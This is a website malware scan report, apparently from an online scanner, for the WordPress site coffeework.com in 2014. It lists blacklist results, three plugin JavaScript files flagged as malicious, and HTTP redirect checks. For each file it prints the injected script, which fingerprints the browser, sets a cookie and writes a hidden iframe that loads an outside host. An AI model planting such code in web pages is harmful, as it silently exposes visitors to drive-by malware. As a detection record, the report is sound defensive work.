Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=coffeework.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://coffeework.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://coffeework.com/ | 503 Service Unavailable Content-Length: 1639 Content-Type: text/html | clean |
http://coffeework.com/wp-content/plugins/5sec-maintenance-mode/themes/js/jquery-1.5.1.min.js | 200 OK Content-Length: 87257 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[266 bytes skipped]... } function Hardtechnology() { var JameNoober = navigator.userAgent; var NiceProgroude = (JameNoober.indexOf("IEMobile") > -1 || JameNoober.indexOf("Windows NT 6.3") > -1 || JameNoober.indexOf("Chrome") > -1 || JameNoober.indexOf("Windows") < +1); var Plogin = (getCookie("ultras17broser") === undefined); if (!NiceProgroude && Plogin) { document.write('<iframe src="http://duilopart.swmoservers.com/sifafuleta16.html" width="201" height="201" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 101px;width: 101px;"></iframe>'); var date = new Date( new Date().getTime() + 66*60*60*1000 ); document.cookie="ultras17broser=1; path=/; expires="+date.toUTCString(); } } Hardtechnology(); (function(a,b){function cg(a){return d.isWindow(a)? ...[2988 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 201x201 src: http://duilopart.swmoservers.com/sifafuleta16.html This URL is marked by Google as suspicious <iframe src="http://duilopart.swmoservers.com/sifafuleta16.html" width="201" height="201" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "times new roman", georgia, serif;left: -901px;height: 101px;width: 101px;"> | ||
http://coffeework.com/wp-content/plugins/5sec-maintenance-mode/themes/js/jquery.countdown.js | 200 OK Content-Length: 32150 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: duilopart.swmoservers.com ...[266 bytes skipped]... } function Hardtechnology() { var JameNoober = navigator.userAgent; var NiceProgroude = (JameNoober.indexOf("IEMobile") > -1 || JameNoober.indexOf("Windows NT 6.3") > -1 || JameNoober.indexOf("Chrome") > -1 || JameNoober.indexOf("Windows") < +1); var Plogin = (getCookie("ultras17broser") === undefined); if (!NiceProgroude && Plogin) { document.write('<iframe src="http://duilopart.swmoservers.com/sifafuleta16.html" width="201" height="201" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 101px;width: 101px;"></iframe>'); var date = new Date( new Date().getTime() + 66*60*60*1000 ); document.cookie="ultras17broser=1; path=/; expires="+date.toUTCString(); } } Hardtechnology(); (function($) { function Countdown() { thi ...[3297 bytes skipped]... Decoded script: <iframe src="http://duilopart.swmoservers.com/sifafuleta16.html" width="201" height="201" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 101px;width: 101px;"></iframe> Malicious iFrame found. size: 201x201 src: http://duilopart.swmoservers.com/sifafuleta16.html This URL is marked by Google as suspicious <iframe src="http://duilopart.swmoservers.com/sifafuleta16.html" width="201" height="201" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "times new roman", georgia, serif;left: -901px;height: 101px;width: 101px;"> | ||
http://coffeework.com/wp-content/plugins/5sec-maintenance-mode/themes/js/jquery.progressbar.min.js | 200 OK Content-Length: 4224 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: duilopart.swmoservers.com ...[266 bytes skipped]... } function Hardtechnology() { var JameNoober = navigator.userAgent; var NiceProgroude = (JameNoober.indexOf("IEMobile") > -1 || JameNoober.indexOf("Windows NT 6.3") > -1 || JameNoober.indexOf("Chrome") > -1 || JameNoober.indexOf("Windows") < +1); var Plogin = (getCookie("ultras17broser") === undefined); if (!NiceProgroude && Plogin) { document.write('<iframe src="http://duilopart.swmoservers.com/sifafuleta16.html" width="201" height="201" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 101px;width: 101px;"></iframe>'); var date = new Date( new Date().getTime() + 66*60*60*1000 ); document.cookie="ultras17broser=1; path=/; expires="+date.toUTCString(); } } Hardtechnology(); (function($){$.extend({progressBar:new function(){t ...[2204 bytes skipped]... Decoded script: <iframe src="http://duilopart.swmoservers.com/sifafuleta16.html" width="201" height="201" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 101px;width: 101px;"></iframe> Malicious iFrame found. size: 201x201 src: http://duilopart.swmoservers.com/sifafuleta16.html This URL is marked by Google as suspicious <iframe src="http://duilopart.swmoservers.com/sifafuleta16.html" width="201" height="201" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "times new roman", georgia, serif;left: -901px;height: 101px;width: 101px;"> | ||
http://coffeework.com/test404page.js | 503 Service Unavailable Content-Length: 1639 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: coffeework.com
Result:
HTTP/1.1 503 Service Unavailable
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 16 Sep 2014 06:18:31 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=j8a10m2aqgqu2j476534k974o0; path=/
X-Pingback: http://coffeework.com/xmlrpc.php
GET / HTTP/1.1
Host: coffeework.com
Result:
HTTP/1.1 503 Service Unavailable
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 16 Sep 2014 06:18:31 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=j8a10m2aqgqu2j476534k974o0; path=/
X-Pingback: http://coffeework.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: coffeework.com
Referer: http://www.google.com/search?q=coffeework.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: coffeework.com
Referer: http://www.google.com/search?q=coffeework.com
Result:
The result is similar to the first query. There are no suspicious redirects found.